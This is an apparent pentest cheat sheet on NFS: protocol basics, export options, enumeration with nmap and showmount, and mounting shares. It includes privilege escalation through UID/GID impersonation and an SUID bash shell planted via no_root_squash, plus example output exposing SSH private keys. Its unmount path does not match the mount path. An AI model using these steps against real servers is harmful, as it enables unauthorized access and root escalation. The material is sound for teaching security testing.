NFS
Table of Contents
- Introduction to NFS
- Enumeration Techniques
- Advanced Techniques
- Exploitation Scenarios
- Combining Tools
- Glossary
Introduction to NFS
What is NFS?
The Network File System (NFS) is a distributed file system protocol developed by Sun Microsystems. It enables remote access to files over a network as if they were on a local machine.
- Purpose: Facilitates file sharing across Linux and Unix systems.
- Ports: NFS commonly uses ports
111(rpcbind) and2049(NFS).
NFS Versions
| Version | Features |
|---|---|
| NFSv2 | Operates over UDP, older but widely supported. |
| NFSv3 | Introduces variable file sizes and improved error handling, supports both TCP and UDP. |
| NFSv4 | Adds Kerberos authentication, ACLs, and operates statefully, making it suitable for internet use. |
Default Configuration
NFS configuration relies heavily on the /etc/exports file, which defines shared directories and their permissions.
Sample Configuration:
/srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
Common Options:
rw: Read-write access.ro: Read-only access.sync: Ensures synchronous data transfers.no_root_squash: Prevents remapping of root to a non-privileged user (potentially dangerous).subtree_check: Validates that a client accesses only the exported subtree.
Enumeration Techniques
Identifying NFS Shares
Use Nmap to identify NFS services and running RPC programs.
Command:
nmap -p111,2049 -sV -sC TARGET_IP
Example Output:
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2-4 (RPC #100000)
2049/tcp open nfs_acl 3 (RPC #100227)
Examining Exports
Determine the available NFS shares and their access restrictions.
Command:
showmount -e TARGET_IP
Example Output:
Export list for 10.129.14.128:
/mnt/nfs 10.129.14.0/24
Advanced Techniques
Mounting NFS Shares
Mount discovered NFS shares locally for inspection.
Commands:
-
Create a directory for the mount:
mkdir target-nfs -
Mount the share:
sudo mount -t nfs TARGET_IP:/mnt/nfs ./target-nfs -o nolock -
Unmount the share:
sudo umount /mnt/nfs
Analyzing Permissions
Review file and directory permissions within the mounted share.
Commands:
-
Display with user/group names:
ls -l ./target-nfs -
Display with UID/GID:
ls -n ./target-nfs
Example Output:
-rw-r--r-- 1 root root 1872 Sep 19 17:27 id_rsa
-rw-r--r-- 1 root root 348 Sep 19 17:28 id_rsa.pub
Exploitation Scenarios
Privilege Escalation via UID/GID Matching
If you have access to UID/GID mappings, replicate them locally to gain elevated access.
Steps:
-
Create a matching user:
sudo useradd -u [UID] -g [GID] user -
Access the share:
sudo -u user cat ./target-nfs/file
Exploiting Misconfigured Shares
No Root Squash:
- Allows root to create files with elevated permissions on the NFS share.
Command:
-
Place an SUID shell:
cp /bin/bash ./target-nfs/bash chmod +s ./target-nfs/bash -
Execute the shell:
./bash -p
Combining Tools
Using Nmap for NFS Discovery
Use Nmap’s NSE scripts for NFS enumeration.
Command:
nmap --script nfs-ls,nfs-statfs -p111,2049 TARGET_IP
Example Output:
nfs-ls: Volume /mnt/nfs
rwxrwxrwx 65534 65534 4096 Sep 25 17:28 .
rw-r--r-- 0 0 1872 Sep 25 17:27 id_rsa
Integrating NFS with Scripting
Automate NFS enumeration with Bash.
Script:
#!/bin/bash
showmount -e $1
mount -t nfs $1:/mnt/nfs ./target-nfs -o nolock
ls -l ./target-nfs
Usage:
./nfs_enum.sh TARGET_IP
Glossary
| Term | Definition |
|---|---|
| NFS | Network File System for sharing files across networks. |
| RPC | Remote Procedure Call protocol used by NFS. |
| UID/GID | User ID and Group ID associated with file ownership. |
| No Root Squash | NFS setting allowing root to retain its permissions. |
| Mount | Command to attach an NFS share to the local file system. |